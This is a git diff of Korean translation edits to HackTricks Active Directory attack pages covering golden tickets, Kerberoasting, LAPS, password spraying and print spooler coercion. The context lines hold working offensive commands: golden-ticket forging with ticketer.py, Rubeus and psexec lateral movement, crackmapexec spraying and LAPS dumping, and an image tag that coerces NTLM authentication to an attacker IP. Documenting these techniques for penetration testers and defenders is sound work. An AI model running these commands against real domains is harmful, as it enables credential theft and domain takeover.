-이 시나리오에서 외부 도메인이 당신을 신뢰하고 있거나(또는 서로 신뢰하고 있는 경우) 당신은 그에 대한 어떤 종류의 접근 권한을 얻을 수 있습니다.
+이 시나리오에서 외부 도메인이 당신을 신뢰하고 있거나 (또는 서로 신뢰하고 있는 경우) 당신은 그에 대한 어떤 종류의 접근 권한을 얻을 수 있습니다.
 
 ## 열거
 
@@ -56,13 +56,13 @@ IsDomain     : True
 # You may also enumerate where foreign groups and/or users have been assigned
 # local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
 ```
-이전 열거에서 사용자 **`crossuser`**가 **외부 도메인**의 **DC** 내에서 **Admin access**를 가진 **`External Admins`** 그룹에 속해 있는 것으로 확인되었습니다.
+이전 열거에서 사용자 **`crossuser`**가 **외부 도메인**의 **DC** 내에서 **관리자 액세스**를 가진 **`External Admins`** 그룹에 속해 있는 것으로 확인되었습니다.
 
-## 초기 접근
+## 초기 액세스
 
-다른 도메인에서 사용자에 대한 **특별한** 접근 권한을 **찾지 못한 경우**, AD 방법론으로 돌아가서 **비특권 사용자에서 권한 상승**을 시도할 수 있습니다(예: kerberoasting과 같은):
+다른 도메인에서 사용자에 대한 **특별한** 액세스를 **찾지 못한 경우**, AD 방법론으로 돌아가서 **비특권 사용자에서 권한 상승**을 시도할 수 있습니다(예: kerberoasting과 같은):
 
-`-Domain` 매개변수를 사용하여 **Powerview functions**를 사용하여 **다른 도메인**을 **열거**할 수 있습니다:
+`-Domain` 매개변수를 사용하여 **Powerview 함수**를 사용하여 **다른 도메인**을 **열거**할 수 있습니다:
 ```powershell
 Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName
 ```
@@ -78,9 +78,9 @@ Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName
 ```powershell
 Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator
 ```
-### SID History Abuse
+### SID History 남용
 
-당신은 또한 숲 신뢰를 통해 [**SID History**](sid-history-injection.md)를 악용할 수 있습니다.
+당신은 또한 숲 신뢰를 통해 [**SID History**](sid-history-injection.md)를 남용할 수 있습니다.
 
 사용자가 **한 숲에서 다른 숲으로** 마이그레이션되고 **SID 필터링이 활성화되지 않은 경우**, **다른 숲의 SID를 추가하는 것이 가능**해지며, 이 **SID**는 **신뢰를 통해 인증할 때** **사용자의 토큰에 추가**됩니다.
 
diff --git a/src/windows-hardening/active-directory-methodology/golden-ticket.md b/src/windows-hardening/active-directory-methodology/golden-ticket.md
index 385e1bae4..3080ff2fc 100644
--- a/src/windows-hardening/active-directory-methodology/golden-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/golden-ticket.md
@@ -4,11 +4,11 @@
 
 ## Golden ticket
 
-**Golden Ticket** 공격은 **NTLM 해시를 사용하여 임의의 사용자를 가장한 합법적인 티켓 부여 티켓(TGT)을 생성하는 것**으로 구성됩니다. 이 기술은 **가장한 사용자로서 도메인 내의 모든 서비스나 머신에 접근할 수 있게 해주기 때문에** 특히 유리합니다. **krbtgt 계정의 자격 증명은 자동으로 업데이트되지 않는다는 점을 기억하는 것이 중요합니다.**
+**Golden Ticket** 공격은 **Active Directory (AD) krbtgt 계정의 NTLM 해시를 사용하여 임의의 사용자를 가장한 합법적인 Ticket Granting Ticket (TGT)를 생성하는 것**으로 구성됩니다. 이 기술은 **가장한 사용자로서 도메인 내의 모든 서비스나 머신에 접근할 수 있게 해주기 때문에** 특히 유리합니다. **krbtgt 계정의 자격 증명은 자동으로 업데이트되지 않는다는 점을 기억하는 것이 중요합니다.**
 
-krbtgt 계정의 **NTLM 해시를 획득하기 위해** 다양한 방법을 사용할 수 있습니다. 이는 도메인 내의 모든 도메인 컨트롤러(DC)에 위치한 **로컬 보안 권한 하위 시스템 서비스(LSASS) 프로세스** 또는 **NT 디렉터리 서비스(NTDS.dit) 파일**에서 추출할 수 있습니다. 또한, **DCsync 공격을 실행하는 것**도 이 NTLM 해시를 얻는 또 다른 전략으로, Mimikatz의 **lsadump::dcsync 모듈**이나 Impacket의 **secretsdump.py 스크립트**와 같은 도구를 사용하여 수행할 수 있습니다. 이러한 작업을 수행하기 위해서는 **도메인 관리자 권한 또는 유사한 수준의 접근 권한이 일반적으로 필요하다는 점을 강조하는 것이 중요합니다.**
+krbtgt 계정의 **NTLM 해시를 획득하기 위해** 다양한 방법을 사용할 수 있습니다. 이는 도메인 내의 모든 도메인 컨트롤러(DC)에 위치한 **Local Security Authority Subsystem Service (LSASS) 프로세스** 또는 **NT Directory Services (NTDS.dit) 파일**에서 추출할 수 있습니다. 또한, **DCsync 공격을 실행하는 것**도 이 NTLM 해시를 얻기 위한 또 다른 전략으로, Mimikatz의 **lsadump::dcsync 모듈**이나 Impacket의 **secretsdump.py 스크립트**와 같은 도구를 사용하여 수행할 수 있습니다. 이러한 작업을 수행하기 위해서는 **도메인 관리자 권한 또는 유사한 수준의 접근 권한이 일반적으로 필요하다는 점을 강조하는 것이 중요합니다.**
 
-NTLM 해시는 이 목적을 위한 유효한 방법으로 사용되지만, 운영 보안상의 이유로 **고급 암호화 표준(AES) Kerberos 키(AES128 및 AES256)를 사용하여 티켓을 위조하는 것이 강력히 권장됩니다.**
+NTLM 해시는 이 목적을 위한 유효한 방법으로 사용될 수 있지만, 운영 보안상의 이유로 **Advanced Encryption Standard (AES) Kerberos 키(AES128 및 AES256)를 사용하여 티켓을 위조하는 것이 강력히 권장됩니다.**
 ```bash:From Linux
 python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
 export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
@@ -28,11 +28,11 @@ kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1
 
 ### 일반적인 탐지 우회
 
-**golden ticket**을 탐지하는 가장 빈번한 방법은 **케르베로스 트래픽**을 검사하는 것입니다. 기본적으로 Mimikatz는 TGT를 **10년 동안 서명**하므로, 이후 TGS 요청에서 비정상적으로 보일 것입니다.
+**golden ticket**을 탐지하는 가장 일반적인 방법은 **케르베로스 트래픽**을 검사하는 것입니다. 기본적으로 Mimikatz는 TGT를 **10년 동안 서명**하므로, 이후 TGS 요청에서 비정상적으로 보일 것입니다.
 
 `Lifetime : 3/11/2021 12:39:57 PM ; 3/9/2031 12:39:57 PM ; 3/9/2031 12:39:57 PM`
 
-`/startoffset`, `/endin` 및 `/renewmax` 매개변수를 사용하여 시작 오프셋, 기간 및 최대 갱신(모두 분 단위)을 제어합니다.
+`/startoffset`, `/endin` 및 `/renewmax` 매개변수를 사용하여 시작 오프셋, 지속 시간 및 최대 갱신(모두 분 단위)을 제어합니다.
 ```
 Get-DomainPolicy | select -expand KerberosPolicy
 ```
diff --git a/src/windows-hardening/active-directory-methodology/kerberoast.md b/src/windows-hardening/active-directory-methodology/kerberoast.md
index 37c492fc9..542839d12 100644
--- a/src/windows-hardening/active-directory-methodology/kerberoast.md
+++ b/src/windows-hardening/active-directory-methodology/kerberoast.md
@@ -4,7 +4,7 @@
 
 ## Kerberoast
 
-Kerberoasting은 **Active Directory (AD)**에서 **사용자 계정**에 따라 운영되는 서비스와 관련된 **TGS 티켓**의 획득에 중점을 둡니다. 이 티켓의 암호화는 **사용자 비밀번호**에서 유래한 키를 사용하므로 **오프라인 자격 증명 크래킹**이 가능합니다. 서비스로서 사용자 계정을 사용하는 것은 비어 있지 않은 **"ServicePrincipalName"** 속성으로 표시됩니다.
+Kerberoasting은 **Active Directory (AD)**에서 **사용자 계정**에 따라 운영되는 서비스와 관련된 **TGS 티켓**의 획득에 중점을 둡니다. 이 티켓의 암호화는 **사용자 비밀번호**에서 유래한 키를 사용하므로 **오프라인 자격 증명 크래킹**이 가능합니다. 서비스로서 사용자 계정의 사용은 비어 있지 않은 **"ServicePrincipalName"** 속성으로 표시됩니다.
 
 **Kerberoasting**을 실행하기 위해서는 **TGS 티켓**을 요청할 수 있는 도메인 계정이 필수적이지만, 이 과정은 **특별한 권한**을 요구하지 않으므로 **유효한 도메인 자격 증명**을 가진 누구나 접근할 수 있습니다.
 
@@ -39,7 +39,7 @@ adenum -d <DOMAIN.FULL> -ip <DC_IP> -u <USERNAME> -p <PASSWORD> -c
 ```
 #### Windows
 
-- **Kerberoastable 사용자 열거**
+- **Kerberoastable 사용자 나열**
 ```powershell
 # Get Kerberoastable users
 setspn.exe -Q */* #This is a built-in binary. Focus on user accounts
@@ -125,9 +125,9 @@ Kerberoasting의 위험을 완화하기 위해:
 
 ## 도메인 계정 없이 Kerberoast
 
-**2022년 9월**, Charlie Clark라는 연구자가 자신의 플랫폼 [exploit.ph](https://exploit.ph/)를 통해 시스템을 악용하는 새로운 방법을 밝혀냈습니다. 이 방법은 **KRB_AS_REQ** 요청을 통해 **서비스 티켓(ST)**를 획득할 수 있게 해주며, 놀랍게도 어떤 Active Directory 계정에 대한 제어도 필요하지 않습니다. 본질적으로, 주체가 사전 인증을 요구하지 않도록 설정된 경우—사이버 보안 영역에서 **AS-REP Roasting 공격**으로 알려진 시나리오와 유사한 경우—이 특성을 활용하여 요청 프로세스를 조작할 수 있습니다. 구체적으로, 요청 본문 내의 **sname** 속성을 변경함으로써 시스템이 표준 암호화된 티켓 부여 티켓(TGT) 대신 **ST**를 발급하도록 속일 수 있습니다.
+**2022년 9월**, Charlie Clark라는 연구원이 자신의 플랫폼 [exploit.ph](https://exploit.ph/)를 통해 시스템을 악용하는 새로운 방법을 밝혔습니다. 이 방법은 **KRB_AS_REQ** 요청을 통해 **서비스 티켓(ST)**를 획득할 수 있게 해주며, 놀랍게도 어떤 Active Directory 계정에 대한 제어도 필요하지 않습니다. 본질적으로, 주체가 사전 인증을 요구하지 않도록 설정된 경우—사이버 보안 영역에서 **AS-REP Roasting 공격**으로 알려진 시나리오와 유사한 경우—이 특성을 활용하여 요청 프로세스를 조작할 수 있습니다. 구체적으로, 요청 본문 내의 **sname** 속성을 변경함으로써 시스템이 표준 암호화된 티켓 부여 티켓(TGT) 대신 **ST**를 발급하도록 속일 수 있습니다.
 
-이 기술은 이 기사에서 완전히 설명되어 있습니다: [Semperis 블로그 게시물](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/).
+이 기술에 대한 자세한 설명은 이 기사에서 확인할 수 있습니다: [Semperis 블로그 게시물](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/).
 
 > [!WARNING]
 > 이 기술을 사용하여 LDAP를 쿼리할 유효한 계정이 없기 때문에 사용자 목록을 제공해야 합니다.
diff --git a/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
index 16e134289..2b84cdddf 100644
--- a/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
+++ b/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
@@ -13,7 +13,7 @@ Kerberos "Double Hop" 문제는 공격자가 **두 개의** **홉**을 통해 **
 1. User1이 자격 증명을 제공하고 **도메인 컨트롤러**가 User1에게 Kerberos **TGT**를 반환합니다.
 2. User1이 **TGT**를 사용하여 **Server1**에 연결하기 위한 **서비스 티켓**을 요청합니다.
 3. User1이 **Server1**에 **연결**하고 **서비스 티켓**을 제공합니다.
-4. **Server1**은 User1의 **자격 증명**이나 User1의 **TGT**를 캐시하지 않습니다. 따라서 Server1에서 User1이 두 번째 서버에 로그인하려고 할 때, 그는 **인증할 수 없습니다**.
+4. **Server1**은 User1의 **자격 증명**이나 User1의 **TGT**를 캐시하지 않습니다. 따라서 Server1의 User1이 두 번째 서버에 로그인하려고 할 때 **인증할 수 없습니다**.
 
 ### Unconstrained Delegation
 
@@ -26,7 +26,7 @@ PC에서 **제한 없는 위임**이 활성화되어 있으면, **서버**는 
 
 > CredSSP 인증은 로컬 컴퓨터에서 원격 컴퓨터로 사용자 자격 증명을 위임합니다. 이 관행은 원격 작업의 보안 위험을 증가시킵니다. 원격 컴퓨터가 손상되면 자격 증명이 전달될 때, 해당 자격 증명은 네트워크 세션을 제어하는 데 사용될 수 있습니다.
 
-보안 문제로 인해 **CredSSP**는 프로덕션 시스템, 민감한 네트워크 및 유사한 환경에서 비활성화하는 것이 강력히 권장됩니다. **CredSSP**가 활성화되어 있는지 확인하려면 `Get-WSManCredSSP` 명령을 실행할 수 있습니다. 이 명령은 **CredSSP 상태를 확인**할 수 있으며, **WinRM**이 활성화되어 있는 경우 원격으로도 실행할 수 있습니다.
+보안 문제로 인해 **CredSSP**는 프로덕션 시스템, 민감한 네트워크 및 유사한 환경에서 비활성화하는 것이 강력히 권장됩니다. **CredSSP**가 활성화되어 있는지 확인하려면 `Get-WSManCredSSP` 명령을 실행할 수 있습니다. 이 명령은 **CredSSP 상태를 확인**할 수 있으며, **WinRM**이 활성화되어 있으면 원격으로도 실행할 수 있습니다.
 ```powershell
 Invoke-Command -ComputerName bizintel -Credential ta\redsuit -ScriptBlock {
 Get-WSManCredSSP
@@ -36,7 +36,7 @@ Get-WSManCredSSP
 
 ### Invoke Command
 
-더블 홉 문제를 해결하기 위해 중첩된 `Invoke-Command`를 포함하는 방법이 제시됩니다. 이는 문제를 직접적으로 해결하지는 않지만 특별한 구성이 필요 없는 우회 방법을 제공합니다. 이 접근 방식은 초기 공격 머신에서 실행된 PowerShell 명령 또는 첫 번째 서버와 이전에 설정된 PS-Session을 통해 보조 서버에서 명령(`hostname`)을 실행할 수 있게 합니다. 방법은 다음과 같습니다:
+더블 홉 문제를 해결하기 위해 중첩된 `Invoke-Command`를 포함하는 방법이 제시됩니다. 이는 문제를 직접적으로 해결하지는 않지만 특별한 구성이 필요 없는 우회 방법을 제공합니다. 이 접근 방식은 초기 공격 머신에서 실행된 PowerShell 명령어를 통해 또는 첫 번째 서버와 이전에 설정된 PS-Session을 통해 보조 서버에서 명령어(`hostname`)를 실행할 수 있게 합니다. 방법은 다음과 같습니다:
 ```powershell
 $cred = Get-Credential ta\redsuit
 Invoke-Command -ComputerName bizintel -Credential $cred -ScriptBlock {
diff --git a/src/windows-hardening/active-directory-methodology/laps.md b/src/windows-hardening/active-directory-methodology/laps.md
index 15beaa20a..07129d57d 100644
--- a/src/windows-hardening/active-directory-methodology/laps.md
+++ b/src/windows-hardening/active-directory-methodology/laps.md
@@ -85,7 +85,7 @@ DC01.DOMAIN_NAME.LOCAL      j&gR+A(s976Rf% 12/10/2022 13:24:41
 ```
 ## **Dumping LAPS Passwords With Crackmapexec**
 
-powershell에 접근할 수 없는 경우, LDAP를 사용하여 이 권한을 원격으로 악용할 수 있습니다.
+powershell에 접근할 수 없는 경우 LDAP를 통해 이 권한을 원격으로 악용할 수 있습니다.
 ```
 crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
 ```
@@ -103,7 +103,7 @@ Password: 2Z@Ae)7!{9#Cq
 
 ### **만료 날짜**
 
-관리자가 되면, **비밀번호를 얻고** **비밀번호 업데이트를 방지**하기 위해 **만료 날짜를 미래로 설정**하는 것이 가능합니다.
+관리자가 되면, **비밀번호를 얻고** **비밀번호 업데이트를 방지**하기 위해 **만료 날짜를 미래로 설정**할 수 있습니다.
 ```powershell
 # Get expiration time
 Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
@@ -117,7 +117,7 @@ Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="2326099
 
 ### 백도어
 
-LAPS의 원본 소스 코드는 [여기](https://github.com/GreyCorbel/admpwd)에서 찾을 수 있으므로, 코드에 백도어를 삽입하는 것이 가능합니다 (예: `Main/AdmPwd.PS/Main.cs`의 `Get-AdmPwdPassword` 메서드 내부) 이 백도어는 어떤 식으로든 **새 비밀번호를 유출하거나 어딘가에 저장**할 수 있습니다.
+LAPS의 원본 소스 코드는 [여기](https://github.com/GreyCorbel/admpwd)에서 찾을 수 있으며, 따라서 코드에 백도어를 삽입하는 것이 가능합니다 (예: `Main/AdmPwd.PS/Main.cs`의 `Get-AdmPwdPassword` 메서드 내부) 이는 어떤 식으로든 **새 비밀번호를 유출하거나 어딘가에 저장**할 수 있습니다.
 
 그런 다음, 새로운 `AdmPwd.PS.dll`을 컴파일하고 `C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll`에 업로드합니다 (그리고 수정 시간을 변경합니다).
 
diff --git a/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md b/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
index fe2506730..5fd9ff5fd 100644
--- a/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
+++ b/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
@@ -15,11 +15,11 @@ python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2
 export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
 python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
 ```
-AES256이 필요한 시나리오에서는 `-aesKey [AES key]` 옵션을 사용할 수 있습니다. 또한, 획득한 티켓은 smbexec.py 또는 wmiexec.py와 같은 다양한 도구와 함께 사용되어 공격의 범위를 넓힐 수 있습니다.
+AES256이 필요한 시나리오에서는 `-aesKey [AES key]` 옵션을 사용할 수 있습니다. 또한, 획득한 티켓은 smbexec.py 또는 wmiexec.py와 같은 다양한 도구와 함께 사용될 수 있어 공격의 범위를 넓힙니다.
 
-_PyAsn1Error_ 또는 _KDC cannot find the name_과 같은 문제는 일반적으로 Impacket 라이브러리를 업데이트하거나 IP 주소 대신 호스트 이름을 사용하여 해결되며, 이는 Kerberos KDC와의 호환성을 보장합니다.
+_PyAsn1Error_ 또는 _KDC cannot find the name_과 같은 문제는 일반적으로 Impacket 라이브러리를 업데이트하거나 IP 주소 대신 호스트 이름을 사용하여 해결되며, Kerberos KDC와의 호환성을 보장합니다.
 
-Rubeus.exe를 사용한 대체 명령 시퀀스는 이 기술의 또 다른 측면을 보여줍니다:
+Rubeus.exe를 사용하는 대체 명령 시퀀스는 이 기술의 또 다른 측면을 보여줍니다:
 ```bash
 .\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
 .\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
diff --git a/src/windows-hardening/active-directory-methodology/password-spraying.md b/src/windows-hardening/active-directory-methodology/password-spraying.md
index eb8798fed..655107a99 100644
--- a/src/windows-hardening/active-directory-methodology/password-spraying.md
+++ b/src/windows-hardening/active-directory-methodology/password-spraying.md
@@ -1,20 +1,20 @@
-# 비밀번호 스프레이 / 무차별 대입 공격
+# Password Spraying / Brute Force
 
 {{#include ../../banners/hacktricks-training.md}}
 
 
-## **비밀번호 스프레이**
+## **Password Spraying**
 
-여러 **유효한 사용자 이름**을 찾은 후, 발견된 각 사용자에 대해 가장 **일반적인 비밀번호**를 시도할 수 있습니다(환경의 비밀번호 정책을 염두에 두세요).\
-**기본적으로** **최소** **비밀번호** **길이**는 **7**입니다.
+여러 **유효한 사용자 이름**을 찾은 후, 발견된 각 사용자에 대해 가장 **일반적인 비밀번호**를 시도할 수 있습니다 (환경의 비밀번호 정책을 염두에 두세요).\
+기본적으로 **최소** **비밀번호** **길이**는 **7**입니다.
 
 일반적인 사용자 이름 목록도 유용할 수 있습니다: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
 
-여러 개의 잘못된 비밀번호를 시도하면 **일부 계정이 잠길 수 있습니다**(기본적으로 10개 이상).
+여러 개의 잘못된 비밀번호를 시도하면 **일부 계정이 잠길 수 있습니다** (기본적으로 10개 이상).
 
-### 비밀번호 정책 가져오기
+### Get password policy
 
-사용자 자격 증명이나 도메인 사용자로서 쉘이 있는 경우, **다음 명령어로 비밀번호 정책을 가져올 수 있습니다**:
+사용자 자격 증명이나 도메인 사용자로서의 쉘이 있는 경우, **다음 명령어로 비밀번호 정책을 가져올 수 있습니다**:
 ```bash
 # From Linux
 crackmapexec <IP> -u 'user' -p 'password' --pass-pol
@@ -31,9 +31,9 @@ net accounts
 
 (Get-DomainPolicy)."SystemAccess" #From powerview
 ```
-### Exploitation from Linux (or all)
+### Linux(또는 모든)에서의 악용
 
-- Using **crackmapexec:**
+- **crackmapexec** 사용:
 ```bash
 crackmapexec smb <IP> -u users.txt -p passwords.txt
 # Local Auth Spray (once you found some local admin pass or hash)
@@ -99,7 +99,7 @@ Outlook에 대한 p**assword spraying**을 위한 여러 도구가 있습니다.
 - [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) 사용 (Powershell)
 - [MailSniper](https://github.com/dafthack/MailSniper) 사용 (Powershell)
 
-이 도구를 사용하려면 사용자 목록과 비밀번호 / 비밀번호의 작은 목록이 필요합니다.
+이 도구 중 하나를 사용하려면 사용자 목록과 비밀번호 / 비밀번호의 작은 목록이 필요합니다.
 ```bash
 ./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
 [x] Failed: larsson:Summer2020
diff --git a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
index 890cdb89f..14c5f6c51 100644
--- a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
+++ b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
@@ -1,4 +1,4 @@
-# NTLM 권한 인증 강제화
+# Force NTLM Privileged Authentication
 
 {{#include ../../banners/hacktricks-training.md}}
 
@@ -6,18 +6,18 @@
 
 [**SharpSystemTriggers**](https://github.com/cube0x0/SharpSystemTriggers)는 **3rd party dependencies**를 피하기 위해 MIDL 컴파일러를 사용하여 C#로 코딩된 **원격 인증 트리거**의 **모음**입니다.
 
-## 스풀러 서비스 남용
+## Spooler Service Abuse
 
 _**Print Spooler**_ 서비스가 **활성화**되어 있으면, 이미 알려진 AD 자격 증명을 사용하여 도메인 컨트롤러의 프린트 서버에 새로운 인쇄 작업에 대한 **업데이트**를 **요청**하고 이를 **어떤 시스템으로 알리도록** 지시할 수 있습니다.\
 프린터가 임의의 시스템으로 알림을 보낼 때, 해당 **시스템**에 대해 **인증**해야 합니다. 따라서 공격자는 _**Print Spooler**_ 서비스가 임의의 시스템에 대해 인증하도록 만들 수 있으며, 이 인증에서 서비스는 **컴퓨터 계정**을 **사용**합니다.
 
-### 도메인에서 Windows 서버 찾기
+### Finding Windows Servers on the domain
 
 PowerShell을 사용하여 Windows 박스 목록을 가져옵니다. 서버는 일반적으로 우선 순위가 높으므로, 여기에 집중합시다:
 ```bash
 Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
 ```
-### Spooler 서비스 수신 찾기
+### Spooler 서비스 수신 확인
 
 약간 수정된 @mysmartlogin의 (Vincent Le Toux의) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket)를 사용하여 Spooler 서비스가 수신 중인지 확인합니다:
 ```bash
@@ -34,14 +34,14 @@ rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
 ```bash
 SpoolSample.exe <TARGET> <RESPONDERIP>
 ```
-또는 Linux에서 작업 중이라면 [**3xocyte의 dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) 또는 [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py)를 사용하세요.
+또는 Linux를 사용하는 경우 [**3xocyte의 dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) 또는 [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py)를 사용하세요.
 ```bash
 python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
 printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
 ```
 ### Unconstrained Delegation과 결합
 
-공격자가 이미 [Unconstrained Delegation](unconstrained-delegation.md)으로 컴퓨터를 손상시킨 경우, 공격자는 **프린터가 이 컴퓨터에 대해 인증하도록 만들 수 있습니다**. 비제한 위임으로 인해 **프린터의 컴퓨터 계정의 TGT**가 비제한 위임이 있는 컴퓨터의 **메모리**에 **저장됩니다**. 공격자가 이미 이 호스트를 손상시켰기 때문에, 그는 **이 티켓을 검색하고 악용할 수 있습니다** ([Pass the Ticket](pass-the-ticket.md)).
+공격자가 이미 [Unconstrained Delegation](unconstrained-delegation.md)으로 컴퓨터를 손상시킨 경우, 공격자는 **프린터가 이 컴퓨터에 대해 인증하도록 만들 수 있습니다**. 비제한 위임으로 인해 **프린터의 컴퓨터 계정의 TGT**가 비제한 위임이 있는 컴퓨터의 **메모리에 저장됩니다**. 공격자가 이미 이 호스트를 손상시켰기 때문에, 그는 **이 티켓을 검색하고 악용할 수 있습니다** ([Pass the Ticket](pass-the-ticket.md)).
 
 ## RCP 강제 인증
 
@@ -49,13 +49,13 @@ printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
 
 ## PrivExchange
 
-`PrivExchange` 공격은 **Exchange Server `PushSubscription` 기능**에서 발견된 결함의 결과입니다. 이 기능은 Exchange 서버가 메일박스가 있는 모든 도메인 사용자에 의해 HTTP를 통해 제공된 클라이언트 호스트에 인증되도록 강제할 수 있게 합니다.
+`PrivExchange` 공격은 **Exchange Server `PushSubscription` 기능**에서 발견된 결함의 결과입니다. 이 기능은 Exchange 서버가 메일박스가 있는 모든 도메인 사용자에 의해 HTTP를 통해 제공된 클라이언트 호스트에 인증하도록 강제할 수 있게 합니다.
 
-기본적으로 **Exchange 서비스는 SYSTEM으로 실행되며** 과도한 권한이 부여됩니다 (특히, **2019년 이전 누적 업데이트의 도메인에 대한 WriteDacl 권한**을 가집니다). 이 결함은 **LDAP에 정보를 중계하고 이후 도메인 NTDS 데이터베이스를 추출할 수 있도록** 악용될 수 있습니다. LDAP로의 중계가 불가능한 경우에도 이 결함은 여전히 도메인 내 다른 호스트에 중계하고 인증하는 데 사용될 수 있습니다. 이 공격의 성공적인 악용은 인증된 도메인 사용자 계정으로 도메인 관리자에 즉시 접근할 수 있게 합니다.
+기본적으로 **Exchange 서비스는 SYSTEM으로 실행되며** 과도한 권한이 부여됩니다 (특히, **2019년 누적 업데이트 이전 도메인에 대한 WriteDacl 권한이 있습니다**). 이 결함은 **LDAP에 정보를 중계하고 이후 도메인 NTDS 데이터베이스를 추출할 수 있도록 악용될 수 있습니다**. LDAP로의 중계가 불가능한 경우에도 이 결함은 여전히 도메인 내 다른 호스트에 중계하고 인증하는 데 사용될 수 있습니다. 이 공격의 성공적인 악용은 인증된 도메인 사용자 계정으로 도메인 관리자의 즉각적인 접근을 허용합니다.
 
 ## Windows 내부
 
-이미 Windows 머신 내부에 있는 경우, 다음을 사용하여 권한 있는 계정으로 서버에 연결하도록 Windows를 강제할 수 있습니다:
+Windows 머신 내부에 이미 있는 경우, 다음을 사용하여 권한이 있는 계정으로 서버에 연결하도록 Windows를 강제할 수 있습니다:
 
 ### Defender MpCmdRun
 ```bash
@@ -88,21 +88,21 @@ certutil.exe -syncwithWU  \\127.0.0.1\share
 
 ### 이메일을 통한
 
-당신이 침해하고자 하는 머신에 로그인하는 사용자의 **이메일 주소**를 알고 있다면, 그에게 **1x1 이미지**가 포함된 **이메일**을 보낼 수 있습니다.
+당신이 손상시키고자 하는 머신에 로그인하는 사용자의 **이메일 주소**를 알고 있다면, 그에게 **1x1 이미지**가 포함된 **이메일**을 보낼 수 있습니다.
 ```html
 <img src="\\10.10.17.231\test.ico" height="1" width="1" />
 ```
-그가 그것을 열면, 인증을 시도할 것입니다.
+그가 그것을 열면 인증을 시도할 것입니다.
 
 ### MitM
 
-컴퓨터에 MitM 공격을 수행하고 그가 볼 수 있는 페이지에 HTML을 주입할 수 있다면, 다음과 같은 이미지를 페이지에 주입해 볼 수 있습니다:
+컴퓨터에 MitM 공격을 수행하고 그가 볼 페이지에 HTML을 주입할 수 있다면, 다음과 같은 이미지를 페이지에 주입해 볼 수 있습니다:
 ```html
 <img src="\\10.10.17.231\test.ico" height="1" width="1" />
 ```
 ## NTLMv1 크래킹
 
-[NTLMv1 챌린지를 캡처할 수 있다면 여기를 읽고 크래킹하는 방법을 알아보세요](../ntlm/#ntlmv1-attack).\
+[NTLMv1 챌린지를 캡처할 수 있다면 여기에서 크래킹하는 방법을 읽어보세요](../ntlm/#ntlmv1-attack).\
 &#xNAN;_&#x52;emember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
index 530c7f9b6..36a3b966c 100644
--- a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
+++ b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
@@ -10,7 +10,7 @@
 
 ## 계정 운영자
 
-이 그룹은 도메인에서 관리자가 아닌 계정과 그룹을 생성할 수 있는 권한을 부여받습니다. 또한, 도메인 컨트롤러(DC)에 대한 로컬 로그인을 가능하게 합니다.
+이 그룹은 도메인에서 관리자가 아닌 계정 및 그룹을 생성할 수 있는 권한을 부여받습니다. 또한, 도메인 컨트롤러(DC)에 대한 로컬 로그인을 가능하게 합니다.
 
 이 그룹의 구성원을 식별하기 위해 다음 명령이 실행됩니다:
 ```powershell
@@ -30,7 +30,7 @@ Get-NetGroupMember -Identity "AdminSDHolder" -Recurse
